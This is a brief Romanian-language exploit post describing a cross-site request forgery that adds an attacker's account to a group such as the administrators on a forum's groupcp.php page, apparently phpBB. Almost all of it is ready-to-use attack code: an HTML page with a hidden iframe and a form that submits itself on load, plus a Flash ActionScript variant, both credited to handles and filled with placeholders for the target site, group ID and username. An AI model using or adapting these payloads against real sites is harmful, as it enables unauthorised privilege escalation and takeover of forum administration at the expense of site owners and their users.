Acest CSRF adauga un utilizator la un grup (de exemplu, grupul administratorilor). Html Exploit By Vincy: <html> <iframe name="hackinginside" frameborder="0" height="0" width="0"></iframe> <form action="http://site.com/path/groupcp.php?g=[GROUP_ID]" method="post" name="vincy" target="hackinginside"> <input type="hidden" name="username" value="[YOUR_NAME]"> <input type="submit" name="add" value="Add Member"></form> <script>document.vincy.submit()</script> </html> Flash Exploit By Nexen: var username:String = "[YOUR_NAME]"; var add:String = "Add Member"; var g:String = "[GROUP_ID]"; getURL("http://site.com/path/groupcp.php?g=[GROUP_ID]", "_self", "POST");